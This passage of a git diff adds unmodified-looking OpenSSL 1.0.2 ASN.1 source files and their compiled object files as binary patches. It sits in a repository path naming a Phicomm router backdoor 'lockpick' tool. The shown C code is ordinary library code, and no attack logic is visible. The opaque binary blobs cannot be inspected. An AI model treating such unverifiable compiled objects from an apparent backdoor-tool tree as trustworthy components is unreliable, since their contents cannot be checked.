zaDHMzz6L&|-^BP@#(Np(<DO)k>p#Qz1I*7k#zTz%lJRwnpJ$x=d6RMO=NjYdnIHT=
zf(7Hl_v=HZk2yeb@S`FWjL#S0Lwr5s4UC5w=lVMs-@x=wGyWjsFEP&j<N1#T=fl_g
zI^*~&9L@8ujPp2r%=lNB{$hDWM*p0z_TUYSuVH>3VSFRw?Tm*R?_qos<D-o8IFuQW
zF#Vq~9%cMx#v2*G%sBURjq%M)|9!^!K2~ACpkTEcJ{13@j6cA5J>z^|HZdMz`VUEt
z+lF@m^8YB)=Xsl9d?nLA&Nz?fcNypUXBg+}ea?gbg7GbET>9pM;^mCfcV*=G9gx<A
zxrYV$eefavFhVHE@wWrwNrX_`{vUU+;M{+Xaqj;Z<J>>pzwnswOC78*XRsj0Z(H=u
zErk#Y>7NxnW#;<;>0_>A!LhIq$34Ij6i<ggB->cUWSjIUjymJpWE-nq#&Mo&WWT^T
z*FViT>f_mj<yof^^V}}mSiQnH>hF;K3C6kpdyJ#LD*M+N=lVg(G5_V!B?#si7UH!|
zSNt}?c~El72hxv7PH`X}ll+vdiKk@$Sr<Pb`!BjU`JHg_5!qji8wiE`)AycE7pLz5
zN_cR%-^z4BZ55rmms&+LmkC?ukfnsXGgd|kcMT3I;o<;xP(2!sLKl?;fffkEaDUC@
z=5r;S9q8{j^WZE$V3}d~5p1Kll*#_Vd?{Qg4iwCyH7u>oUbsPL`b}p=pY0h0a|}U^
z%S}x7|BNp>D>7U&WEHefB{oBx#`RjK)}`a6&_!E%r|TTCf@d;vdE841cQ8!W3dKD>
zo?qzm)7s<zF7%22t9YUD>AWKujZd`(0&Kg-ACdDPB12gRUHusJE5$D&52gcBALECi
zbjNQ$uu9|8hTfL;R0XLa>rSXEjelB>ACwEl@o{YT_)h>sl?Z%zxh?md&NGrpcftnQ
zAbg0C4%Vv{@!o9Ptvd=LRK@q2m!Px{atLjjKjG(~fj-^#F=<ctaME|%e;)*u;`fqF
zaQfXA<A>i9$e!}Q(%3lG3sSLD<`KS5v<E0B`+K16&OMYX0r6C>yB6k--!f3EWdF(+
N9Qz+T)y&gv|392!f!F{5

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p8_pkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p8_pkey.c
new file mode 100644
index 0000000..9075483
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p8_pkey.c
@@ -0,0 +1,144 @@
+/* p8_pkey.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+
+/* Minor tweak to operation: zero private key data */
+static int pkey_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                   void *exarg)
+{
+    /* Since the structure must still be valid use ASN1_OP_FREE_PRE */
+    if (operation == ASN1_OP_FREE_PRE) {
+        PKCS8_PRIV_KEY_INFO *key = (PKCS8_PRIV_KEY_INFO *)*pval;
+        if (key->pkey->value.octet_string)
+            OPENSSL_cleanse(key->pkey->value.octet_string->data,
+                            key->pkey->value.octet_string->length);
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(PKCS8_PRIV_KEY_INFO, pkey_cb) = {
+        ASN1_SIMPLE(PKCS8_PRIV_KEY_INFO, version, ASN1_INTEGER),
+        ASN1_SIMPLE(PKCS8_PRIV_KEY_INFO, pkeyalg, X509_ALGOR),
+        ASN1_SIMPLE(PKCS8_PRIV_KEY_INFO, pkey, ASN1_ANY),
+        ASN1_IMP_SET_OF_OPT(PKCS8_PRIV_KEY_INFO, attributes, X509_ATTRIBUTE, 0)
+} ASN1_SEQUENCE_END_cb(PKCS8_PRIV_KEY_INFO, PKCS8_PRIV_KEY_INFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS8_PRIV_KEY_INFO)
+
+int PKCS8_pkey_set0(PKCS8_PRIV_KEY_INFO *priv, ASN1_OBJECT *aobj,
+                    int version,
+                    int ptype, void *pval, unsigned char *penc, int penclen)
+{
+    unsigned char **ppenc = NULL;
+    if (version >= 0) {
+        if (!ASN1_INTEGER_set(priv->version, version))
+            return 0;
+    }
+    if (penc) {
+        int pmtype;
+        ASN1_OCTET_STRING *oct;
+        oct = ASN1_OCTET_STRING_new();
+        if (!oct)
+            return 0;
+        oct->data = penc;
+        ppenc = &oct->data;
+        oct->length = penclen;
+        if (priv->broken == PKCS8_NO_OCTET)
+            pmtype = V_ASN1_SEQUENCE;
+        else
+            pmtype = V_ASN1_OCTET_STRING;
+        ASN1_TYPE_set(priv->pkey, pmtype, oct);
+    }
+    if (!X509_ALGOR_set0(priv->pkeyalg, aobj, ptype, pval)) {
+        /* If call fails do not swallow 'enc' */
+        if (ppenc)
+            *ppenc = NULL;
+        return 0;
+    }
+    return 1;
+}
+
+int PKCS8_pkey_get0(ASN1_OBJECT **ppkalg,
+                    const unsigned char **pk, int *ppklen,
+                    X509_ALGOR **pa, PKCS8_PRIV_KEY_INFO *p8)
+{
+    if (ppkalg)
+        *ppkalg = p8->pkeyalg->algorithm;
+    if (p8->pkey->type == V_ASN1_OCTET_STRING) {
+        p8->broken = PKCS8_OK;
+        if (pk) {
+            *pk = p8->pkey->value.octet_string->data;
+            *ppklen = p8->pkey->value.octet_string->length;
+        }
+    } else if (p8->pkey->type == V_ASN1_SEQUENCE) {
+        p8->broken = PKCS8_NO_OCTET;
+        if (pk) {
+            *pk = p8->pkey->value.sequence->data;
+            *ppklen = p8->pkey->value.sequence->length;
+        }
+    } else
+        return 0;
+    if (pa)
+        *pa = p8->pkeyalg;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p8_pkey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/p8_pkey.o
new file mode 100644
index 0000000000000000000000000000000000000000..808ffeeabbe476c8b6ea4d3f89226a8d2ce935a6
GIT binary patch
literal 4488
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_bitst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_bitst.c
new file mode 100644
index 0000000..d5cf3c7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_bitst.c
@@ -0,0 +1,105 @@
+/* t_bitst.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+int ASN1_BIT_STRING_name_print(BIO *out, ASN1_BIT_STRING *bs,
+                               BIT_STRING_BITNAME *tbl, int indent)
+{
+    BIT_STRING_BITNAME *bnam;
+    char first = 1;
+    BIO_printf(out, "%*s", indent, "");
+    for (bnam = tbl; bnam->lname; bnam++) {
+        if (ASN1_BIT_STRING_get_bit(bs, bnam->bitnum)) {
+            if (!first)
+                BIO_puts(out, ", ");
+            BIO_puts(out, bnam->lname);
+            first = 0;
+        }
+    }
+    BIO_puts(out, "\n");
+    return 1;
+}
+
+int ASN1_BIT_STRING_set_asc(ASN1_BIT_STRING *bs, char *name, int value,
+                            BIT_STRING_BITNAME *tbl)
+{
+    int bitnum;
+    bitnum = ASN1_BIT_STRING_num_asc(name, tbl);
+    if (bitnum < 0)
+        return 0;
+    if (bs) {
+        if (!ASN1_BIT_STRING_set_bit(bs, bitnum, value))
+            return 0;
+    }
+    return 1;
+}
+
+int ASN1_BIT_STRING_num_asc(char *name, BIT_STRING_BITNAME *tbl)
+{
+    BIT_STRING_BITNAME *bnam;
+    for (bnam = tbl; bnam->lname; bnam++) {
+        if (!strcmp(bnam->sname, name) || !strcmp(bnam->lname, name))
+            return bnam->bitnum;
+    }
+    return -1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_bitst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_bitst.o
new file mode 100644
index 0000000000000000000000000000000000000000..eff1af59edd3d9376736c196df83be98727306ca
GIT binary patch
literal 2760
zcmbtV-HRJl6u-%2+f=u+v91!V)B#&bwH=b(O0|e&vQ09<ba!d8&<~d(iRlM6*)?+m
zSy!}>W?@Jde9$LfeDqNeMerrKBE>>M{1*fZbrq>pkji?_oqMv=$>c>3oO{mwov%Ch
zo_ptmY%v!Og&0wYz0P)LgfeFC-PO}VO*574XZNQL{cS9z2F8~mqg-(QG&f&H>yqjG
zQ!<^OoFB~1{RkL~cTt$#^(f;f`?E#o7XkDJ{Q2yS?e>%mG@ajF$G#l}J)7E=aa-|w
z-vS`r1bE?VT<OJS<4t3EODv=;>)tQ+Ytb{kpZQU<zaBH4-(;<Jq_5nI!`xGT+w4N_
zJKbA5m`UWpET;39>D)29zs8*M;Yktie4iTh9&`?gvSx3aPxrw@EA9=ZJ|0YcH88v1
z#g@0&kr!=tOk<BRmY<tDr6rcC?Iv$)uj;dU@_6cGTTD~$&m{HaiK8xz8x#SK0Z#zu
z=a*QRu>oQVFw(RuSm@oeEYyjG4o>ckehAxe0`O<0%|V${W1Hc;8o#N$p=ukE(`uqS
zF|Q`WB{h*#HA9VO)L2H1Ccw2U<4hTMGYsYp<+Q4GBWr5h5RPEefUg51<#EWWv5oK<
zRkPKYp+*rIOL$Td_Qy_;gA&+r_|5dyk47nCmmbA%rifh&!adFFF)J*1%?jJ+@p9G2
zg_sywDV~*kT0$8PPYG>eWJS+NJgBn5_6*}mc@C5Vo~q((0Xqfk)+SF^E{?%3j=}9Q
z_<Mk3U8*N~1F(<A_<th(e*}pn`UB(_z(MO|+^SyXHrH!RFV3ZKNa8Sq!z?pO^C>G+
zC|jlS*}{C@YE~L`YqfQ?$(fZeE@X_NwUEn|vSq7mWQtjfWeN+f{nAM6<+`Zly0p1H
z;?Qh2tcqP@HgDA$t0QI`;?eA16XNg<__d5Z=?c8BqI(|hxOCWq!&|@ze@WtW-wA)s
zgFoT%FG?KqV=t0F-CfLcz=PL7NAlx%-bk2d5}5LI5Cro3f9Aphp9Y=$zZrwy_29TC
z<i7_W03gi&G%(>B=t#I8WTJCYA)NZ~h7YHHW4gW8;FT&!-g4y?(pvRv6`j{Roat{>
zc!lXz+h%%e1t;j9(xLxqD~(1S+DmV)@VX99?{S+~YH!Q=<z`!7ZLO@<TYL>dF=73R
zb*TkyNh|(;QiE{ZBL54J1`H`K_s^ZVzNDi(2#kB12KJJPKN6r<WIXl`s`UQE(FpVc
zFyj6f_nfaT`Xc$^V}N1K{~Di?IcGq6iR$Cs@e<W1nFb^3Nv{*=Rp~(Yjm#8BvH%9s
z$p__T5E$Tl9x(jNczYP84FAnYnizKn+J8dc0R>(C@t@21PsveAfBZGTgU<iDY$#L4
z;rZ_arg%F4pxPL+C>NBF65k9pARcr2&mJJw!9@YxcExa%pEaE0TNf06ORj%?=;<o{
G_<sRjfP9ev

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_crl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_crl.c
new file mode 100644
index 0000000..0dfaf0b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_crl.c
@@ -0,0 +1,133 @@
+/* t_crl.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/bn.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+#ifndef OPENSSL_NO_FP_API
+int X509_CRL_print_fp(FILE *fp, X509_CRL *x)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        X509err(X509_F_X509_CRL_PRINT_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = X509_CRL_print(b, x);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+int X509_CRL_print(BIO *out, X509_CRL *x)
+{
+    STACK_OF(X509_REVOKED) *rev;
+    X509_REVOKED *r;
+    long l;
+    int i;
+    char *p;
+
+    BIO_printf(out, "Certificate Revocation List (CRL):\n");
+    l = X509_CRL_get_version(x);
+    BIO_printf(out, "%8sVersion %lu (0x%lx)\n", "", l + 1, l);
+    i = OBJ_obj2nid(x->sig_alg->algorithm);
+    X509_signature_print(out, x->sig_alg, NULL);
+    p = X509_NAME_oneline(X509_CRL_get_issuer(x), NULL, 0);
+    BIO_printf(out, "%8sIssuer: %s\n", "", p);
+    OPENSSL_free(p);
+    BIO_printf(out, "%8sLast Update: ", "");
+    ASN1_TIME_print(out, X509_CRL_get_lastUpdate(x));
+    BIO_printf(out, "\n%8sNext Update: ", "");
+    if (X509_CRL_get_nextUpdate(x))
+        ASN1_TIME_print(out, X509_CRL_get_nextUpdate(x));
+    else
+        BIO_printf(out, "NONE");
+    BIO_printf(out, "\n");
+
+    X509V3_extensions_print(out, "CRL extensions", x->crl->extensions, 0, 8);
+
+    rev = X509_CRL_get_REVOKED(x);
+
+    if (sk_X509_REVOKED_num(rev) > 0)
+        BIO_printf(out, "Revoked Certificates:\n");
+    else
+        BIO_printf(out, "No Revoked Certificates.\n");
+
+    for (i = 0; i < sk_X509_REVOKED_num(rev); i++) {
+        r = sk_X509_REVOKED_value(rev, i);
+        BIO_printf(out, "    Serial Number: ");
+        i2a_ASN1_INTEGER(out, r->serialNumber);
+        BIO_printf(out, "\n        Revocation Date: ");
+        ASN1_TIME_print(out, r->revocationDate);
+        BIO_printf(out, "\n");
+        X509V3_extensions_print(out, "CRL entry extensions",
+                                r->extensions, 0, 8);
+    }
+    X509_signature_print(out, x->sig_alg, x->signature);
+
+    return 1;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_crl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/t_crl.o
new file mode 100644
index 0000000000000000000000000000000000000000..81d3d86210982b4c221f0e79adb5eb58f3c15442
GIT binary patch
literal 4840
zcmbuCU2GIp6vuD7Kx=`aikK=01GZ8`Haq33C1N_;Zab^%7W;wtfs<{S!oqfUotedg
z2}TJdlck8!2Q@z6lMlY=gN7KRt7r^9_<%1yVibk=K@5rsiuIg3_tL}dt`B;X`}Mp3
zbMBdYXYZYTHj(P9ud8D+)v^28OixnA_AHudck^a9)7V0GdC~H#<|9VM+-{DT!y{I3
zZO95PTT>fR^Y8^Mt#ZUFcZSWWC7guAR&Xg9RIDkh&Zr1wPvdoI*=sb;f<*c-&Kg&&
z@?>*$M^^B0GWb;ZNd-StQ5hBD4VqTD*dk;+S}P3hMp?P2TSu<=P15woo5iyMkWpWM
z8VSk~^Hd`|sBvaSY?Zgg!r97^RJqum3jUyzAE_K_m=PP5)YMj7sf6(}S4nkm*M&m|
zdxKw~Z%%(EhW>_FW*$CS-q0$er5?FBS@v5S|7CQzwHbmAE`{+6b8dO@!1VOARUT@#
zU}L0*$4=q9^7u~k33I3Uq-me#ufs?(xMmI~gWpEDr4@W0)<-I(<q4x=oO!<itUi1R
zijU^=hy0EUeq3t>pQVC}#@P?|0+x2E;CneAMizX^#l68fKJDoq$Mv)0*|Ci8=!4Gw
z0yMIPyq?N>zTVz5m|C-?iLtg$Z@c4qIM9|W>Fu$}w%p{JCge%aD>?2Kz0Kp@R0ixu
zio3ww7M(SLAni;Nk{(DWSQ7)sI&deCK0SsL?{jwPBp46oO&54b>PWPS>5zsTH=D`n
z>C(g~2EdvSVj_>x8^*z>%lqyDIw|Y#>Di*UkBpY`eo60&u8+pn8JkPIYaHr`MPnP*
zgqX28u%OM5=R)pJkFa{iD##*`G2I$gtnT0-tD9`DTe_g3@dRwH1$>zpTLea|Piuam
zzE^8G9*JxE)SS51er&F(#g5MF)jAJ1Jg9X?zNynX`?Q#;wSywAwZygNxYh`!?U45f
zUmn)rYpOn>wH%A|YWmSR^)?X;om%1hHi!K>t#a%~s-9fP<x}2h72&ILBMbfDD$Pz2
zhVSj{6k+&uvr~lKGz*4gwttN)=dxDCVzJ<D3U3jdpAuy3PQg=zVRMz>I~BfK@Pfkc
z72H?2A^3iUZxZ}<h2JOm5rvzAzo+ni!M{-WLxP`IICdj!-Yhx<<QDQi@OKy3C}jK{
zsA&>FHGa4Tf4K%fS%be@gMVIwe^rBjTZ8{ugV)0krrLAOufdlA$90qI#eb*ZJ6c2E
zRfC%~_&^Q5qXuWbJ?7@3V=S8LiD6-2(SgN!EH+@V5sOV&Y{sG!3xlh>c$3>0+{jqZ
zc5IAw*>IrRMK_!Gncbfnh?^;Ups#NzF>DW;@l?WQ@#H`_KF-Xcv|%UH!-@XHpuOAi
z*+BdOyD+-9BcI(BI`gu-^BKS7I>IHNA#FaCunT!7m(4qHT|ByNc)%Wa9VhfRoP^OZ
z090>ZZ_nH&f_wYyd})F~wLg<9IV{_ev1u&IgV^Im9<^tWXLAm3=AEZmVsOwdmVDcB
z-Ga;MnD6FzgGU2<i|O{T!h3<AT7SW9k7<SAcvsv3S@L@bUrKm*J}~YF?%nJ9PN7Ht
zc;`z$Nx@bBBZTAqBlTm1<5?%Ud{5EOa>5S^J<dzxd5-V}ME|1TYCNwJj%y<4Jt?^A
z|4qUd68$@ZtNts5>(G||@qEC9{_&2G{7Zz8)Oo)SF~8a9e*Hwa4sGe@cfrvQe&S0m
zFIY9sdGI^MgnB$zq`p~jRlkbpZzg&?PcWf=C1mMmE8(jM?<Ib2Aso*WOc>8%$kNZ_
zgyXl3<YUA?U7vk~(|HdOei!j`oN(&rHNsno{tdw~&LxDuMfB7U|F8xfu8&Ui9}z!v
z{m<0!bB^e5BYw^k{Yt{G5>9_#D==_K7|-31<$A6rd^O<~;rQJr^)}&a2;WOMe%nZW
